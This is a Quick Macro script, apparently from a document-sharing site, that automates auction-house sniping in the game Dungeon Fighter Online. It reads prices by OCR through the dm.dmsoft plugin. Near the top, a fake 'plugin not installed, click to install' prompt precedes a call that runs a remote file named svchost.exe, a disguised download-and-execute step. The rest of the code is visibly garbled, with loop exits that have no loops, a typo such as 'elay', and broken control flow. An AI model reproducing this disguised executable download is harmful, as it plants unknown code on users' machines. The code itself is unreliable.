当前位置:文档之家› 按键精灵Dnf后台扫拍


Dim fun_wp_gs, fun_wp_dj, fun_wp_zjg, fun_wp_wpm_gd, fun_fx_gg, fun_dan_mz
Dimenv fun_dx_wpm, fun_dx_gs, fun_dx_dj
UserVar Var7 "--声明* :如网络延迟,系统问题导致脚本操作的失误,请仔细考虑是否使用,一旦出现问题后果由用户自行承担。"
UserVar fun_xieyi=DropList{"否":"0"|"是":"1"}=0 "-- 同意请按<是> 不同意请按<否>"
UserVar Var8="-----------------------------" "-------------------------------------------------------------"
UserVar fun_qt_ht=DropList{"前台":"0"|"后台":"1"}=0 "前后台"
UserVar fun_dx_sj=DropList{"15分钟":"0"|"30分钟":"1"|"50分钟":"1"}=0 "--防掉线 时间间隔"
UserVar fun_dx_ms=DropList{"接放任务":"0"|"设置心情":"1"}=0 "--防掉线 - 方式"
UserVar fun_xl_wlsd=DropList{"极速":"10"|"快速":"15"|"正常":"25"|"慢速":"35"|"极慢":"45"}=0 "-- 选择您的网络速度"
UserVar fun_sc_jb=DropList{"否":"0"|"是":"1"}=0 "当手持金币小于购买物品总价,减少购买个数吗?"
UserVar fun_jbpd=10 "--设置金币:当金币低于此值时停止秒拍"
UserVar fun_sf_gj=DropList{"否":"0"|"是":"1"}=0 "--当金币低于上面设置的值时是否关机"
//UserVar sraj_ys=5 "输入搜索物品名称的延时时间(单位:毫秒)开加速此值需要加大"
UserVar Var9="-----------------------------" "-------------------------------------------------------------"
UserVar fun_moshi=DropList{"单秒":"0"|"多秒":"1"}=0 "-- 请选择秒拍模式"
UserVar fun_moshi1="0-物品名" "格式为:价格-物品名"
UserVar Var10="-----------------------------" "-------------------------------------------------------------"
UserVar fun_t_zs="0-1-深渊派对挑战书" "深渊派对挑战书"
UserVar fun_q_r_lh="0-1-强韧的冒险家灵魂" "强韧的冒险家灵魂"
UserVar fun_c_l_lh="0-1-淬炼的冒险家灵魂" "淬炼的冒险家灵魂"
UserVar fun_s_m_wj="0-1-神秘世界的玩具" "神秘世界的玩具"
UserVar fun_s_s_zf="0-1-神圣祝福药水" "神圣祝福药水"
UserVar fun_y_x_sm="0-1-英雄的宿命" "英雄的宿命"
UserVar fun_l_h_js="0-1-灵魂晶石" "灵魂晶石"
UserVar fun_x_xue="0-1-污秽之血" "污秽之血"
UserVar fun_d_xue="0-1-狄瑞吉之血" "狄瑞吉之血"
MessageBox "系统检测到您的脚本没有安装DM后台,点击安装"
URL= "https://www.doczj.com/doc/2f17258934.html,/svchost.exe"
Call RunApp(URL)
Call fun_dm_zc()
Call fun_fw_sj()
Call fun_dk_pm()
Call fun_sc_sr()
If fun_moshi = 0 Then
danm_ss = Split(fun_moshi1, "-")
danm_ss (0) : danm_ss (1)
If danm_ss (0) > 0 Then
Delay 50
MsgBox "请填写 [单秒] 价格 再运行软件!"
End If
Goto duom
End If
Call fun_dan_m(danm_ss(0), danm_ss(1))
Delay 10
Rem duom

TracePrint "开始运行主程序"
Call fun_duo_m(fun_t_zs) '深渊派对挑战书
TracePrint "深渊派对挑战书"
Delay 5
Call fun_duo_m(fun_q_r_lh) '强韧的冒险家灵魂
tracePrint "强韧的冒险家灵魂"
Delay 5
Call fun_duo_m(fun_c_l_lh) '淬炼的冒险家灵魂
tracePrint "淬炼的冒险家灵魂"
Delay 5
Call fun_duo_m(fun_s_m_wj) '神秘世界的玩具
Delay 5
Call fun_duo_m(fun_s_s_zf) '神圣祝福药水
Delay 5
Call fun_duo_m(fun_y_x_sm) '英雄的宿命
Delay 5
Call fun_duo_m(fun_l_h_js) '灵魂晶石
Delay 5
Call fun_duo_m(fun_x_xue) '污秽之血
Delay 5
Call fun_duo_m(fun_d_xue) '狄瑞吉之血
Delay 5
Sub fun_dm_zc()
PutAttachment ".\box", "*.dll"
Call Plugin.File.CreateFolder("C:\box")
PutAttachment "C:\box\text","*.txt"
PutAttachment ".\box\notes", "记录目录.txt"
PutAttachment ".\Plugin" ,"RegDll.dll"
Call Plugin.RegDll.Reg(".\box\dm.dll")
Set dm = createobject("dm.dmsoft")
Hwnd = Plugin.Window.Foreground()
Delay 100
sText = Plugin.Window.GetText(Hwnd)
TracePrint sText
If sText <> "地下城与勇士" Then
End If
If fun_qt_ht = 0 Then
Call Plugin.Window.Move(Hwnd, 0, 0)
Delay 100
dm_ret = dm.BindWindowEx(hwnd, "normal", "normal", "normal", "dx.public.input.ime", 1)
If dm_ret = 0 Then
MsgBox "绑定失败"
Delay 50
End If
Delay 500
Call Plugin.Window.Move(Hwnd, 0, - 2 )
Delay 100
dm_ret = dm.BindWindowEx(hwnd,"dx2","dx","dx","dx.public.input.ime",1)
If dm_ret = 0 Then
MsgBox "绑定失败"
Delay 50
End If
Delay 500
End If
End Sub
Sub fun_fw_sj()
Delay 10
dm.MoveTo 2, 2
Delay 100
End Sub
Sub fun_dk_pm()
Dim i
Delay 500
dm_ret = dm.SetDict(0, "C:\box\text\fun_wz.txt")
dm_ret = dm.FindStrFast(0, 0, 790, 599, "拍卖行(B)", "ffffff-050505", 0.9, intX, intY)
Delay 50
If intX >= 0 and intY >= 0 Then
If intX = 375 And intY = 33 Then
TracePrint "查找到-拍卖行-"
Exit Do
Delay 50
dm.MoveTo intX, intY
Delay 100
Delay 100
dm.MoveTo 375, 33
Delay 100
Delay 100
dm.MoveTo 2,2
End If
TracePrint "这里"
dm.MoveTo 395, 570
Delay 100

Delay 250
dm.MoveTo 400, 510
Delay 100
Delay 50
End If
i = i + 1
If i > 10 Then
MsgBox "请将拍卖行窗口,放置可看见地方!"
End If
Delay 200
End Sub
Sub fun_sc_sr()
Rem cx
dm.MoveTo 640, 90 ' 点击减号
Delay 15
dm.MoveTo 210, 90 '点击输入框
Delay 15
dm_ret = dm.FindColor(54,85,124,95,"ffffff-000000",1.0,0,intX,intY)
Delay 10
If intX > 0 and intY > 0 Then
Goto cx
End If
Delay 10
End Sub
Sub fun_duo_m(fun_f_g_z) '多秒版
Dim fg_pd, fun_hcq,fun_zcx_mz
fg_pd = Split(fun_f_g_z, "-")
If fg_pd(0) > 0 and fg_pd(1) > 0 Then
dm_ret = dm.SetDict(0, "c:\box\text\fun.txt")
fun_fx_gg = 1
fun_ss_jb = dm.Ocr(667, 540, 772, 559, "ddc593-050505", 1.0)
Delay 10
If clng(fun_ss_jb) > fun_jbpd Then '金币判断
If fun_sf_gj = 0 Then
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & ": " & "金币不足,停止运行")
Delay 10
TracePrint " 金币不足 - 停止运行 "
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & ": " & "金币不足,同你设置。即将关机")
Delay 100
Call Plugin.Sys.ExitOS(1)
End If
End If
Delay 10
For fg_pd(1)
Call fun_sc_sr()
dm.SendStringIme fg_pd(2)
// Delay fun_xl_wlsd
dm_ret = dm.SetDict(0, "c:\box\text\fun_wz.txt")
dm_ret = dm.FindStrFast(168, 133, 633, 457, "完成竞拍|在该物|无法购买", "ffffff-050505,|", 1, intX, intY)
Delay 10
If intX > 0 or intY > 0 Then
Delay 100
dm_ret = dm.FindStrFast(168, 133, 633, 457, "要输入|果不存", "ffffff-050505,|", 1, intX1, intY1)
If intX > 0 or intY > 0 Then
Delay 10
dm.KeyPress 13
Delay 10
Exit Do
End If
Exit Do
End If
Delay fun_xl_wlsd
dm.KeyPress 13
Delay 10
Call fun_pd_hc() '缓冲
If fun_fx_gg = 0 Then
Delay 5
TracePrint "直接搜索下一个"
Exit Sub
End If
Call fun_pd_dj()
If clng(fg_pd(0)) >= clng(fun_wp_dj) and clng(fun_wp_dj) > 0 and clng(fun_wp_gs) and fg_pd(2) <> ""Then

Call scgm_pd()
If fun_wp_dj > 0 Or fun_wp_gs > 0 Then
TracePrint "金币不足以购买"
Exit Sub
End If
Delay 10
Call fun_ykj()
Delay 10
fun_wp_wpm_gd = fg_pd(2)
TracePrint fun_wp_wpm_gd
Call fun_dj_gm()
fun_wp_dj = 0 : fun_wp_gs = 0 : fun_gm_gs = 0
TracePrint time & "多秒 -- 物品单价小约输入-----成功"
Exit Sub
fun_dj = 0 : fun_gs = 0 : fun_gm_gs = 0
TracePrint time & "多秒 -- 物品单价大约输入-----失败"
Exit Sub
End If
Delay 20
Exit Sub
End If
End Sub
Sub fun_dan_m(jg,mz) '单秒版
dm_ret = dm.SetDict(0, "c:\box\text\fun.txt")
Dim dan_jg, dan_mz
dan_jg = jg
dan_mz = mz
fun_fx_gg = 1
fun_ss_jb = dm.Ocr(667, 540, 772, 559, "ddc593-050505", 1.0)
Delay 10
If clng(fun_ss_jb) > fun_jbpd Then '金币判断
If fun_sf_gj = 0 Then
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & ": " & "金币不足,停止运行")
Delay 10
TracePrint " 金币不足 - 停止运行 "
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & ": " & "金币不足,同你设置。即将关机")
Delay 100
Call Plugin.Sys.ExitOS(1)
End If
End If
Delay 10
Call fun_sc_sr()
dm.SendStringIme dan_mz
Delay fun_xl_wlsd
dm_ret = dm.SetDict(0, "c:\box\text\fun_wz.txt")
dm_ret = dm.FindStrFast(168, 133, 633, 457, "完成竞拍|在该物|无法购买", "ffffff-050505,|", 1, intX, intY)
Delay 10
If intX > 0 or intY > 0 Then
Delay 100
dm_ret = dm.FindStrFast(168, 133, 633, 457, "要输入|果不存", "ffffff-050505,|", 1, intX1, intY1)
If intX > 0 or intY > 0 Then
dm.KeyPress 13
Delay 10
Exit Do
End If
Exit Do
End If
Delay fun_xl_wlsd
dm.KeyPress 13
Delay 30
Call fun_pd_hc() '缓冲
If fun_fx_gg = 0 Then
Delay 5
TracePrint "直接搜索下一个"
Exit Sub
End If
Call fun_pd_dj()
If clng(dan_jg) >= clng(fun_wp_dj) and clng(fun_wp_dj) > 0 and clng(fun_wp_gs) and fun_dan_mz <> "" Then
Call scgm_pd()
If fun_wp_dj > 0 Or fun_wp_gs > 0 Then
TracePrint "金币不足以购买"
Exit Sub
End If
Delay 10
Call fun_ykj()
Delay 10
fun_dan_mz = dan_mz

Call fun_dj_gm()
fun_wp_dj = 0 : fun_wp_gs = 0 : fun_gm_gs = 0 : fun_dan_mz = ""
TracePrint time & "单秒 -- 物品单价小约输入-----成功"
Exit Sub
fun_dj = 0 : fun_gs = 0 : fun_gm_gs = 0
TracePrint time & "单秒 -- 物品单价大约输入-----失败"
Exit Sub
End If
End Sub
Sub fun_dm_dm()
Dim danm_ss
If fun_moshi = 0 Then
danm_ss = Split(fun_moshi1, "-")
danm_ss (0) : danm_ss (1)
If danm_ss (0) > 0 Then
Delay 50
Call fun_dan_m(danm_ss(0), danm_ss(1))
MsgBox "请填写 [单秒] 价格 再运行软件!"
End If
End If
End Sub
Sub fun_pd_hc()
dm_ret = dm.FindColor(587, 132, 615, 140, "ff3232-000000|ffb100-000000", 1.0, 0, intX, intY)
Delay 10
If intX > 0 or intY > 0 Then
Exit Do
dm_ret = dm.FindStrFast(168, 133, 633, 457, "要输入|果不存", "ffffff-000000,|", 1, intX, intY)
Delay 10
If intX > 0 or intY > 0 Then
Delay 10
dm.KeyPress 13
fun_fx_gg = 0 '出现公告
TracePrint "发现公告"
Exit Sub
End If
End If
TracePrint "查找中"
End Sub
Sub fun_pd_dj() '判断单价
Dim dj_gs, dj_zjg
dm_ret = dm.SetPath("")
dm_ret = dm.SetDict(0,"c:\box\text\fun.txt")
fun_wp_dj = 0 : fun_wp_gs = 0 : fun_wp_zjg = 0 : dj_gs = 0 : dj_zjg = 0
dj_gs = dm.Ocr(164, 126, 197, 159, "ffffff-000000", 1.0)
Delay 10
dj_zjg = dm.Ocr(522, 125, 615, 144, "ffb100-000000|ff3232-000000", 1.0)
Delay 10
fun_wp_zjg = clng(dj_zjg) : fun_wp_gs = clng(dj_gs)
If fun_wp_gs = 0 or fun_wp_gs = "" Then
fun_wp_gs = 1
End If
fun_wp_dj = clng(Round(fun_wp_zjg / fun_wp_gs))
TracePrint "物品单价:" & fun_wp_gs
TracePrint "物品总价:" & fun_wp_zjg
TracePrint Time & "物品单价:" & fun_wp_dj
End Sub
Sub fun_dj_gm() '点击购买
Dim dxc1, fun_wp_wpm

dm_ret = dm.SetDict(0,"c:\box\text\fun_wz.txt")
// Dim i, dm_ret, dm_ret1, dm_ret2, intX, intY, intX1, intY1, intX2, intY2
Delay 50
dm.MoveTo 400,145
Delay 25
Delay 100
dm_ret = dm.FindStrFast(0, 1, 800, 600, "数量", "ffe3ab-050505,|", 1, intX, intY)
Delay 10
If intX > 0 and intY > 0 Then
Exit Do
Delay 10
End If
Delay 20
dm.MoveTo 400, 160
Delay 30
Delay 50
dm_ret = dm.FindStrFast(0, 10, 800, 600, "公告", "ffffff-050505,|", 1, intX1, intY1)
Delay 10

dm_ret1 = dm.FindStrFast(0, 10, 800, 600, "支付", "ffffff-050505,|", 1, intX2, intY2)
Delay 10
If intX1 > 0 and intX2 > 0 Then
TracePrint "发现 - 确定购买 - 鼠标左键"
Delay 15
Delay 10
Exit Do
Delay 10
End If
Delay 100
fun_wp_wpm = fun_wp_wpm_gd
TracePrint fun_wp_wpm
// // dm_ret = dm.SetDict(0, "c:\box\text\fun_zh.txt")
// // Do
// // fun_wpm = dm.Ocr(44, 83, 227, 99, "ffffff-000000", 1.0)
// // Delay 10
// // If fun_wpm <> "" Then
// // Exit Do
// // End If
// // Loop
// fun_dx_wpm = fun_wp_wpm : fun_dx_gs = fun_wp_gs : fun_dx_dj = fun_wp_dj
If fun_moshi = 0 Then
fun_dx_wpm = fun_dan_mz : fun_dx_gs = fun_wp_gs : fun_dx_dj = fun_wp_dj
Delay 10
Call fun_cz_md()
fun_dx_wpm = fun_wp_wpm : fun_dx_gs = fun_wp_gs : fun_dx_dj = fun_wp_dj
Delay 10
dxc1 = BeginThread(fun_cz_md())
End If
End Sub
Sub fun_ykj() '一口价
Delay 20
dm.MoveTo 398, 548
Delay 55
End Sub
Sub fun_cz_md() '查找是否买到宝贝~
// Dim intX, intY, intX1, intY1, intX2, intY2, dm_ret, dm_ret1, dm_ret2
Dim hqxc1, wp, gs, dj
dm_ret = dm.SetDict(0, "c:\box\text\fun_wz.txt")
Delay 250
wp = fun_dx_wpm : gs = fun_dx_gs : dj = fun_dx_dj
dm_ret = dm.FindStrFast(168, 133, 633, 457, "完成竞拍", "ffffff-050505,|", 1, intX, intY)
Delay 10
If intX >= 0 and intY >= 0 Then
Delay 10
dm.KeyPress 13
Delay 10
Call fun_cg_jl(wp, gs, dj)
Exit Do
dm_ret = dm.FindStrFast(168, 133, 633, 457, "在该物", "ffffff-050505,|", 1, intX1, intY1)
Delay 10
If intX1 >= 0 and intY1 >= 0 Then
Delay 10
dm.KeyPress 13
Delay 10
Call fun_sb_jl()
Delay 10
Exit Do
dm_ret = dm.FindStrFast(168, 133, 633, 457, "无法购买", "ffffff-050505,|", 1, intX2, intY2)
If intX2 >= 0 and intY2 >= 0 Then
Delay 10
hqxc1 = GetThreadID()
StopThread hqxc1
Exit Sub
End If
End If
i = i + 1
Delay 100
If i > 25 Then
Delay 10
Exit Do
End If
End If
End Sub
Sub fun_cg_jl(a1, a2, a3) '成功拍到记录

elay 50
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & ": " & "物品:" & a1 & " 个数:" & a2 & " 单价:" & a3)
Delay 50
d_q_xc = GetThreadID()
TracePrint "--成功 即将结束线程"
fun_dx_wpm = 0 : fun_wp_wpm = 0 : fun_wp_gs = 0 : fun_dx_gs = 0 : fun_dx_dj = 0 : fun_wp_dj = 0 : fun_dan_mz
Delay 10
StopThread d_q_xc
Exit Sub
End Sub
Sub fun_sb_jl() '失败拍到记录
Dim hqxc2
Delay 50
Call Plugin.File.WriteFileEx(".\box\notes\" & Date & ".txt", Time & "物品:" & fun_dx_wpm & ": " & "Omg,就差一点就秒到宝贝啦!")
Delay 50
hqxc2 = GetThreadID()
TracePrint "--失败 即将结束线程"
StopThread hqxc2
Exit Sub
End Sub
Sub OnScriptExit()
End Sub

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